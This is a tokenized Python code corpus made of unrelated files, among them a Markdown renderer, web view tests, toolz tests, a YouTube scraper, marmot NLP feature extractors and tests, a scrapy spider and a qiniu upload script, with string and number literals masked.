) : <EOL> linenos = self . _linenos <EOL> try : <EOL> lexer = get_lexer_by_name ( lang , stripall = True ) <EOL> formatter = HtmlFormatter ( <EOL> noclasses = inlinestyles , linenos = linenos <EOL> ) <EOL> code = highlight ( text , lexer , formatter ) <EOL> if linenos : <EOL> return '<STR_LIT>' % code <EOL> return code <EOL> except : <EOL> return '<STR_LIT>' % ( <EOL> lang , escape ( text ) <EOL> ) <EOL> class PlainRenderer ( BaseRenderer ) : <EOL> def header ( self , text , level ) : <EOL> return '<STR_LIT>' % ( level , text ) <EOL> def markdown ( text , renderer = '<STR_LIT>' , inlinestyles = False , linenos = False ) : <EOL> """<STR_LIT>""" <EOL> if not text : <EOL> return u'<STR_LIT>' <EOL> flags = m . HTML_ESCAPE <EOL> if renderer == '<STR_LIT>' : <EOL> r = HighlightRenderer ( flags = flags ) <EOL> r . _inlinestyles = inlinestyles <EOL> r . _linenos = linenos <EOL> elif renderer == '<STR_LIT>' : <EOL> r = PlainRenderer ( flags = flags ) <EOL> else : <EOL> r = BaseRenderer ( flags = flags ) <EOL> extensions = ( <EOL> m . EXT_NO_INTRA_EMPHASIS | m . EXT_FENCED_CODE | m . EXT_AUTOLINK | <EOL> m . EXT_TABLES | m . EXT_STRIKETHROUGH | m . EXT_SUPERSCRIPT <EOL> ) <EOL> md = m . Markdown ( r , extensions = extensions ) <EOL> return md . render ( text ) <EOL> def timesince ( value ) : <EOL> now = datetime . datetime . utcnow ( ) <EOL> delta = now - value <EOL> if delta . days > <NUM_LIT> : <EOL> return _ ( '<STR_LIT>' , num = delta . days / <NUM_LIT> ) <EOL> if delta . days > <NUM_LIT:30> : <EOL> return _ ( '<STR_LIT>' , num = delta . days / <NUM_LIT:30> ) <EOL> if delta . days > <NUM_LIT:0> : <EOL> return _ ( '<STR_LIT>' , num = delta . days ) <EOL> if delta . seconds > <NUM_LIT> : <EOL> return _ ( '<STR_LIT>' , num = delta . seconds / <NUM_LIT> ) <EOL> if delta . seconds > <NUM_LIT> : <EOL> return _ ( '<STR_LIT>' , num = delta . seconds / <NUM_LIT> ) <EOL> return _ ( '<STR_LIT>' ) <EOL> def xmldatetime ( value ) : <EOL> if not isinstance ( value , datetime . datetime ) : <EOL> return value <EOL> return value . strftime ( '<STR_LIT>' ) </s>
<s> from . suite import BaseSuite <EOL> class TestUser ( BaseSuite ) : <EOL> def test_users ( self ) : <EOL> url = self . url_for ( '<STR_LIT>' ) <EOL> rv = self . client . get ( url ) <EOL> assert '<STR_LIT>' in rv . data <EOL> rv = self . client . get ( url + '<STR_LIT>' ) <EOL> assert rv . status_code == <NUM_LIT> <EOL> def test_city ( self ) : <EOL> url = self . url_for ( '<STR_LIT>' , city = '<STR_LIT>' ) <EOL> rv = self . client . get ( url ) <EOL> assert '<STR_LIT>' in rv . data <EOL> rv = self . client . get ( url + '<STR_LIT>' ) <EOL> assert rv . status_code == <NUM_LIT> <EOL> def test_view ( self ) : <EOL> self . prepare_account ( ) <EOL> rv = self . client . get ( self . url_for ( '<STR_LIT>' , username = '<STR_LIT:foo>' ) ) <EOL> assert '<STR_LIT>' in rv . data <EOL> rv = self . client . get ( self . url_for ( '<STR_LIT>' , username = '<STR_LIT:foo>' ) ) <EOL> assert rv . status_code == <NUM_LIT:200> <EOL> rv = self . client . get ( self . url_for ( '<STR_LIT>' , username = '<STR_LIT:foo>' <EOL> ) + '<STR_LIT>' ) <EOL> assert rv . status_code == <NUM_LIT> </s>
<s> from toolz . curried import * <EOL> import os <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> os . system ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def stem ( word ) : <EOL> """<STR_LIT>""" <EOL> return word . lower ( ) . rstrip ( "<STR_LIT>" ) . lstrip ( "<STR_LIT>" ) <EOL> wordcount = comp ( frequencies , map ( stem ) , concat , map ( str . split ) ) <EOL> def test_shakespeare ( ) : <EOL> with open ( '<STR_LIT>' ) as f : <EOL> counts = wordcount ( f ) </s>
<s> from toolz import * <EOL> import pickle <EOL> def test_compose ( ) : <EOL> f = compose ( str , sum ) <EOL> g = pickle . loads ( pickle . dumps ( f ) ) <EOL> assert f ( ( <NUM_LIT:1> , <NUM_LIT:2> ) ) == g ( ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> def test_curry ( ) : <EOL> f = curry ( map ) ( str ) <EOL> g = pickle . loads ( pickle . dumps ( f ) ) <EOL> assert list ( f ( ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ) ) == list ( g ( ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ) ) <EOL> def test_juxt ( ) : <EOL> f = juxt ( str , int , bool ) <EOL> g = pickle . loads ( pickle . dumps ( f ) ) <EOL> assert f ( <NUM_LIT:1> ) == g ( <NUM_LIT:1> ) <EOL> assert f . funcs == g . funcs <EOL> def test_complement ( ) : <EOL> f = complement ( bool ) <EOL> assert f ( True ) is False <EOL> assert f ( False ) is True <EOL> g = pickle . loads ( pickle . dumps ( f ) ) <EOL> assert f ( True ) == g ( True ) <EOL> assert f ( False ) == g ( False ) </s>
<s> import json <EOL> import subprocess <EOL> from datetime import datetime <EOL> from steve . util import is_youtube <EOL> class ScraperError ( Exception ) : <EOL> pass <EOL> class Scraper ( object ) : <EOL> def scrape ( self , url ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplemented <EOL> class YoutubeScraper ( object ) : <EOL> def transform_item ( self , item ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> '<STR_LIT:title>' : item [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : item [ '<STR_LIT:description>' ] , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT:state>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : item [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : item [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : item [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : datetime . strptime ( item [ '<STR_LIT>' ] , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : item [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ ] <EOL> } <EOL> def scrape ( self , url ) : <EOL> """<STR_LIT>""" <EOL> if not is_youtube ( url ) : <EOL> return <EOL> try : <EOL> output = subprocess . check_output ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , url ] , <EOL> stderr = subprocess . STDOUT <EOL> ) <EOL> except subprocess . CalledProcessError as cpe : <EOL> raise ScraperError ( '<STR_LIT>' . format ( cpe . output ) ) <EOL> except OSError : <EOL> raise ScraperError ( '<STR_LIT>' ) <EOL> items = [ ] <EOL> for line in output . splitlines ( ) : <EOL> items . append ( json . loads ( line ) ) <EOL> items = [ self . transform_item ( item ) for item in items ] <EOL> return items </s>
<s> from __future__ import division <EOL> import numpy as np <EOL> import multiprocessing as multi <EOL> import logging <EOL> import types <EOL> import sklearn <EOL> from sklearn . preprocessing import LabelBinarizer , MultiLabelBinarizer <EOL> from import_utils import import_class <EOL> from preprocessing_utils import map_feature_extractor <EOL> logging . basicConfig ( format = '<STR_LIT>' , level = logging . INFO ) <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> def init_class ( klass , args ) : <EOL> return klass ( * args ) <EOL> def filter_contexts ( token_contexts , min_total = <NUM_LIT:1> ) : <EOL> return { token : contexts for token , contexts in token_contexts . items ( ) if len ( contexts ) >= min_total } <EOL> def filter_contexts_class ( token_contexts , min_total = <NUM_LIT:1> , min_class_count = <NUM_LIT:1> , proportion = <NUM_LIT:2> ) : <EOL> new_token_contexts = { } <EOL> classes = set ( [ cc [ '<STR_LIT>' ] for context in token_contexts . values ( ) for cc in context ] ) <EOL> for token , contexts in token_contexts . items ( ) : <EOL> if len ( contexts ) < min_total : <EOL> continue <EOL> class_counts = { cl : <NUM_LIT:0> for cl in classes } <EOL> for cc in contexts : <EOL> class_counts [ cc [ '<STR_LIT>' ] ] += <NUM_LIT:1> <EOL> min_class = min ( class_counts . values ( ) ) <EOL> cur_proportion = max ( class_counts . values ( ) ) / max ( min_class , <NUM_LIT:1> ) <EOL> if min_class >= min_class_count and cur_proportion <= proportion : <EOL> new_token_contexts [ token ] = contexts <EOL> return new_token_contexts <EOL> import copy <EOL> def convert_tagset ( tagmap , tok_contexts ) : <EOL> tok_contexts_copy = copy . deepcopy ( tok_contexts ) <EOL> for tok , contexts in tok_contexts_copy . iteritems ( ) : <EOL> for context in contexts : <EOL> context [ '<STR_LIT>' ] = tagmap [ context [ '<STR_LIT>' ] ] <EOL> return tok_contexts_copy <EOL> def flatten ( lofl ) : <EOL> return [ item for sublist in lofl for item in sublist ] <EOL> def map_contexts ( tokens , context_creators ) : <EOL> return { token : flatten ( [ creator . get_contexts ( token ) for creator in context_creators ] ) for token in tokens } <EOL> def map_context_creators ( ( token , context_creators ) ) : <EOL> logger . info ( '<STR_LIT>' + token ) <EOL> contexts = flatten ( [ creator . get_contexts ( token ) for creator in context_creators ] ) <EOL> return token , contexts <EOL> def map_contexts ( tokens , context_creators , workers = <NUM_LIT:1> ) : <EOL> if workers == <NUM_LIT:1> : <EOL> return { token : flatten ( [ creator . get_contexts ( token ) for creator in context_creators ] ) for token in tokens } <EOL> else : <EOL> pool = multi . Pool ( workers ) <EOL> tokens_with_extractors = [ ( token , context_creators ) for token in tokens ] <EOL> res = pool . map ( map_context_creators , tokens_with_extractors ) <EOL> res_dict = { k : v for k , v in res } <EOL> return res_dict <EOL> def token_contexts_to_features ( token_contexts , feature_extractors , workers = <NUM_LIT:1> ) : <EOL> if workers == <NUM_LIT:1> : <EOL> return { token : np . vstack ( [ np . hstack ( [ map_feature_extractor ( ( context , extractor ) ) for extractor in feature_extractors ] ) for context in contexts ] ) for token , contexts in token_contexts . items ( ) } <EOL> else : <EOL> res_dict = { } <EOL> pool = multi . Pool ( workers ) <EOL> print ( "<STR_LIT>" , feature_extractors ) <EOL> for token , contexts in token_contexts . items ( ) : <EOL> logger . info ( '<STR_LIT>' + token + '<STR_LIT>' + str ( len ( contexts ) ) + '<STR_LIT>' ) <EOL> extractors_output = [ ] <EOL> for extractor in feature_extractors : <EOL> context_list = [ ( cont , extractor ) for cont in contexts ] <EOL> extractors_output . append ( np . vstack ( pool . map ( map_feature_extractor , context_list ) ) ) <EOL> res_dict [ token ] = np . hstack ( extractors_output ) <EOL> return res_dict <EOL> def token_contexts_to_features_categorical ( token_contexts , feature_extractors , workers = <NUM_LIT:1> ) : <EOL> if workers == <NUM_LIT:1> : <EOL> return { token : [ [ x for a_list in [ map_feature_extractor ( ( context , extractor ) ) for extractor in feature_extractors ] for x in a_list ] for context in contexts ] for token , contexts in token_contexts . items ( ) } <EOL> else : <EOL> res_dict = { } <EOL> pool = multi . Pool ( workers ) <EOL> print ( "<STR_LIT>" , feature_extractors ) <EOL> for token , contexts in token_contexts . items ( ) : <EOL> logger . info ( '<STR_LIT>' + token + '<STR_LIT>' + str ( len ( contexts ) ) + '<STR_LIT>' ) <EOL> extractors_output = [ ] <EOL> for extractor in feature_extractors : <EOL> context_list = [ ( cont , extractor ) for cont in contexts ] <EOL> extractors_output . append ( pool . map ( map_feature_extractor , context_list ) ) <EOL> intermediate = [ [ x [ i ] for x in extractors_output ] for i in range ( len ( extractors_output [ <NUM_LIT:0> ] ) ) ] <EOL> res_dict [ token ] = [ flatten ( sl ) for sl in intermediate ] <EOL> return res_dict <EOL> def feature_names_from_extractor_list ( feature_extractors ) : <EOL> """<STR_LIT>""" <EOL> feature_names = [ feature_name for feature_extractor in feature_extractors for feature_name in feature_extractor . get_feature_names ( ) ] <EOL> return feature_names <EOL> def tags_from_contexts ( token_contexts ) : <EOL> """<STR_LIT>""" <EOL> return { token : np . array ( [ context [ '<STR_LIT>' ] for context in contexts ] ) for token , contexts in token_contexts . items ( ) } <EOL> def sync_keys ( dict_a , dict_b ) : <EOL> '''<STR_LIT>''' <EOL> dict_a_keys = set ( dict_a . keys ( ) ) <EOL> dict_b_keys = set ( dict_b . keys ( ) ) <EOL> for k in dict_a_keys . symmetric_difference ( dict_b_keys ) : <EOL> if k in dict_a_keys : <EOL> del dict_a [ k ] <EOL> else : <EOL> del dict_b [ k ] </s>
<s> import string <EOL> from marmot . features . feature_extractor import FeatureExtractor <EOL> class PunctuationBigramFeatureExtractor ( FeatureExtractor ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self ) : <EOL> self . punctuation = string . punctuation <EOL> def get_feature ( self , context_obj ) : <EOL> source_punct , target_punct = <NUM_LIT:0> , <NUM_LIT:0> <EOL> for w in context_obj [ '<STR_LIT:target>' ] : <EOL> if w in self . punctuation : <EOL> target_punct += <NUM_LIT:1> <EOL> for w in context_obj [ '<STR_LIT:source>' ] : <EOL> if w in self . punctuation : <EOL> source_punct += <NUM_LIT:1> <EOL> feature_val = str ( source_punct ) + "<STR_LIT:_>" + str ( target_punct ) <EOL> return feature_val <EOL> def get_feature_name ( self ) : <EOL> return "<STR_LIT>" <EOL> def get_features ( self , context_obj ) : <EOL> return [ self . get_feature ( context_obj ) ] <EOL> def get_feature_names ( self ) : <EOL> return [ self . get_feature_name ( ) ] </s>
<s> import unittest <EOL> from marmot . features . target_token_feature_extractor import TargetTokenFeatureExtractor <EOL> class AlignmentFeatureExtractorTests ( unittest . TestCase ) : <EOL> def test_get_features ( self ) : <EOL> obj = { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT:index>' : <NUM_LIT:2> , '<STR_LIT:target>' : [ u'<STR_LIT:a>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:a>' , u'<STR_LIT>' ] , '<STR_LIT:source>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' ] , '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' : [ [ <NUM_LIT:0> ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:3> ] , [ <NUM_LIT:2> ] , [ <NUM_LIT:4> ] ] } <EOL> extractor = TargetTokenFeatureExtractor ( ) <EOL> [ token , left , right ] = extractor . get_features ( obj ) <EOL> self . assertEqual ( token , u'<STR_LIT>' ) <EOL> self . assertEqual ( left , u'<STR_LIT>' ) <EOL> self . assertEqual ( right , u'<STR_LIT:a>' ) <EOL> def test_get_features_two_words ( self ) : <EOL> obj = { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT:index>' : <NUM_LIT:2> , '<STR_LIT:target>' : [ u'<STR_LIT:a>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:a>' , u'<STR_LIT>' ] , '<STR_LIT:source>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' ] , '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' : [ [ <NUM_LIT:0> ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:3> ] , [ <NUM_LIT:2> ] , [ <NUM_LIT:4> ] ] } <EOL> extractor = TargetTokenFeatureExtractor ( context_size = <NUM_LIT:2> ) <EOL> [ token , left , right ] = extractor . get_features ( obj ) <EOL> self . assertEqual ( token , u'<STR_LIT>' ) <EOL> self . assertEqual ( left , u'<STR_LIT>' ) <EOL> self . assertEqual ( right , u'<STR_LIT>' ) <EOL> def test_first_el ( self ) : <EOL> obj = { '<STR_LIT>' : u'<STR_LIT:a>' , '<STR_LIT:index>' : <NUM_LIT:0> , '<STR_LIT:target>' : [ u'<STR_LIT:a>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:a>' , u'<STR_LIT>' ] , '<STR_LIT:source>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' ] , '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' : [ [ <NUM_LIT:0> ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:3> ] , [ <NUM_LIT:2> ] , [ <NUM_LIT:4> ] ] } <EOL> extractor = TargetTokenFeatureExtractor ( context_size = <NUM_LIT:2> ) <EOL> [ token , left , right ] = extractor . get_features ( obj ) <EOL> self . assertEqual ( token , u'<STR_LIT:a>' ) <EOL> self . assertEqual ( left , u'<STR_LIT>' ) <EOL> self . assertEqual ( right , u'<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from __future__ import print_function <EOL> import numpy as np <EOL> from collections import defaultdict <EOL> from marmot . util . alignments import train_alignments <EOL> from marmot . util . force_align import Aligner <EOL> from marmot . representations . representation_generator import RepresentationGenerator <EOL> from marmot . experiment . import_utils import mk_tmp_dir <EOL> class AlignmentRepresentationGenerator ( RepresentationGenerator ) : <EOL> def __init__ ( self , lex_file , align_model = None , src_file = None , tg_file = None , tmp_dir = None ) : <EOL> tmp_dir = mk_tmp_dir ( tmp_dir ) <EOL> if align_model is None : <EOL> if src_file is not None and tg_file is not None : <EOL> self . align_model = train_alignments ( src_file , tg_file , tmp_dir , align_model = align_model ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> return <EOL> else : <EOL> self . align_model = align_model <EOL> self . lex_prob = self . get_align_prob ( lex_file ) <EOL> def get_alignments ( self , src , tg , align_model ) : <EOL> alignments = [ [ [ ] for j in range ( len ( tg [ i ] ) ) ] for i in range ( len ( tg ) ) ] <EOL> aligner = Aligner ( align_model + '<STR_LIT>' , align_model + '<STR_LIT>' , align_model + '<STR_LIT>' , align_model + '<STR_LIT>' ) <EOL> for idx , ( src_list , tg_list ) in enumerate ( zip ( src , tg ) ) : <EOL> align_string = aligner . align ( '<STR_LIT:U+0020>' . join ( src_list ) + '<STR_LIT>' + '<STR_LIT:U+0020>' . join ( tg_list ) ) <EOL> pairs = align_string . split ( ) <EOL> for p_str in pairs : <EOL> p = p_str . split ( '<STR_LIT:->' ) <EOL> alignments [ idx ] [ int ( p [ <NUM_LIT:1> ] ) ] . append ( int ( p [ <NUM_LIT:0> ] ) ) <EOL> aligner . close ( ) <EOL> return alignments <EOL> def get_align_prob ( self , lex_file ) : <EOL> lex_dict = defaultdict ( lambda : defaultdict ( float ) ) <EOL> for line in open ( lex_file ) : <EOL> chunks = line [ : - <NUM_LIT:1> ] . decode ( '<STR_LIT:utf-8>' ) . split ( ) <EOL> assert ( len ( chunks ) == <NUM_LIT:3> ) , "<STR_LIT>" . format ( line ) <EOL> val = float ( chunks [ <NUM_LIT:2> ] ) <EOL> lex_dict [ chunks [ <NUM_LIT:0> ] ] [ chunks [ <NUM_LIT:1> ] ] = val <EOL> return lex_dict <EOL> def generate ( self , data_obj ) : <EOL> if '<STR_LIT:target>' not in data_obj or '<STR_LIT:source>' not in data_obj : <EOL> print ( "<STR_LIT>" ) <EOL> assert ( len ( data_obj [ '<STR_LIT:target>' ] ) == len ( data_obj [ '<STR_LIT:source>' ] ) ) <EOL> all_alignments = self . get_alignments ( data_obj [ '<STR_LIT:source>' ] , data_obj [ '<STR_LIT:target>' ] , self . align_model ) <EOL> unique_alignments = [ ] <EOL> for seq_idx , al_sequence in enumerate ( all_alignments ) : <EOL> seq_alignments = [ ] <EOL> for w_idx , al_list in enumerate ( al_sequence ) : <EOL> if len ( al_list ) > <NUM_LIT:1> : <EOL> target_word = data_obj [ '<STR_LIT:target>' ] [ seq_idx ] [ w_idx ] <EOL> source_words = [ data_obj [ '<STR_LIT:source>' ] [ seq_idx ] [ i ] for i in al_list ] <EOL> probs = [ self . lex_prob [ target_word ] [ s ] for s in source_words ] <EOL> seq_alignments . append ( al_list [ np . argmax ( probs ) ] ) <EOL> elif len ( al_list ) == <NUM_LIT:0> : <EOL> seq_alignments . append ( None ) <EOL> elif len ( al_list ) == <NUM_LIT:1> : <EOL> seq_alignments . append ( al_list [ <NUM_LIT:0> ] ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> unique_alignments . append ( seq_alignments ) <EOL> data_obj [ '<STR_LIT>' ] = unique_alignments <EOL> return data_obj </s>
<s> import unittest , os <EOL> from marmot . util . corpus_context_creator import CorpusContextCreator <EOL> class TestRunExperiment ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> module_path = os . path . dirname ( __file__ ) <EOL> self . module_path = module_path <EOL> self . important_tokens = set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> test_contexts = [ { '<STR_LIT:index>' : <NUM_LIT> , '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:target>' : [ u'<STR_LIT>' , u'<STR_LIT:U+002C>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:U+002C>' , u'<STR_LIT:i>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:a>' , u'<STR_LIT>' , u'<STR_LIT:to>' , u'<STR_LIT>' , u'<STR_LIT:to>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:U+002C>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:U+002C>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:U+002C>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:.>' ] , '<STR_LIT:source>' : None } , { '<STR_LIT:index>' : <NUM_LIT:3> , '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:target>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:a>' , u'<STR_LIT>' , u'<STR_LIT:->' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:a>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:.>' ] , '<STR_LIT:source>' : None } , { '<STR_LIT:index>' : <NUM_LIT> , '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:target>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:to>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:all>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:.>' ] , '<STR_LIT:source>' : None } , { '<STR_LIT:index>' : <NUM_LIT> , '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:target>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:a>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:state>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:U+002C>' , u'<STR_LIT>' , u'<STR_LIT:to>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:U+002C>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:.>' ] , '<STR_LIT:source>' : None } , { '<STR_LIT:index>' : <NUM_LIT:5> , '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:target>' : [ u'<STR_LIT>' , u'<STR_LIT:U+002C>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:a>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:.>' ] , '<STR_LIT:source>' : None } , { '<STR_LIT:index>' : <NUM_LIT:10> , '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:target>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:->' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:to>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:.>' ] , '<STR_LIT:source>' : None } , ] <EOL> self . corpus_cc = CorpusContextCreator ( test_contexts ) <EOL> def test_get_contexts ( self ) : <EOL> and_contexts = self . corpus_cc . get_contexts ( '<STR_LIT>' ) <EOL> self . assertTrue ( len ( and_contexts ) == <NUM_LIT:4> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> from scrapy . spider import Spider <EOL> from scrapy . http import Request <EOL> from scrapy . selector import Selector <EOL> from scrapy import log <EOL> from . . items import CrawlItem <EOL> class ListSpider ( Spider ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> def parse ( self , response ) : <EOL> doc = Selector ( response ) <EOL> item = CrawlItem ( ) <EOL> section = doc . xpath ( "<STR_LIT>" ) <EOL> for sect in section : <EOL> pass <EOL> class DetailSpider ( Spider ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> def parse ( self , response ) : <EOL> pass </s>
<s> from qiniu import Auth , put_file , etag , urlsafe_base64_encode <EOL> import qiniu . config <EOL> access_key = '<STR_LIT>' <EOL> secret_key = '<STR_LIT>' <EOL> q = Auth ( access_key , secret_key ) <EOL> bucket_name = '<STR_LIT>' <EOL> key = '<STR_LIT>' ; <EOL> token = q . upload_token ( bucket_name , key , <NUM_LIT> ) <EOL> localfile = '<STR_LIT>' <EOL> ret , info = put_file ( token , key , localfile ) <EOL> print ( info ) <EOL> assert ret [ '<STR_LIT:key>' ] == key <EOL> assert ret [ '<STR_LIT>' ] == etag ( localfile ) </s>
